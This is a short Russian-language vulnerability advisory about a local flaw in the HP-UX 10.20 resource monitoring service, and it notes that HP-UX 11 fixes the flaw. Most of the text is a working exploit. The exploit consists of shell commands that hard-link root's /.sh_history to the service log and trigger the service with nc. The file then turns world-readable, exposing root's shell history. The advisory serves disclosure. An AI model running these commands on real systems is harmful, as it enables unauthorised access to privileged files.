Уязвимость в HP-UNIX (служба мониторинга ресурсов) позволяет нападающим (с локальным доступом) изменить любой файл в разделе рута на mode 644.

Системы уязвимы:
HP-UX 10.20

Эксплоит:
$ uname -sr
HP-UX B.10.20
$ cd /etc/opt/resmon/log
$ mv registrar.log registrar.log.orig
$ ls -l /.sh_history
-rw——-   1 root       sys           3316 Sep 20 15:22 /.sh_history
$ ln /.sh_history registrar.log
$ nc hpux.example.com 1712 < /etc/motd
$ ls -l /.sh_history
-rw-r—r—   2 root       sys           3605 Nov  8 09:45 /.sh_history
$ rm -f registrar.log
$ mv registrar.log.orig registrar.log
So, /.sh_history becomes world readable, and text similar to
——————-Start Event———————
Event 382 occurred at Wed Nov 8 09:45:28.818524 2000
Process ID: 10931 (/etc/opt/resmon/lbin/registrar) Log Level: Error
_rm_recv: Couldn’t malloc 1073803312 bytes for receive buffer
——————-End Event———————-
Gets appended to it.

Решение:
Уязвимость профиксена в HP-UX 11.



Оставить мнение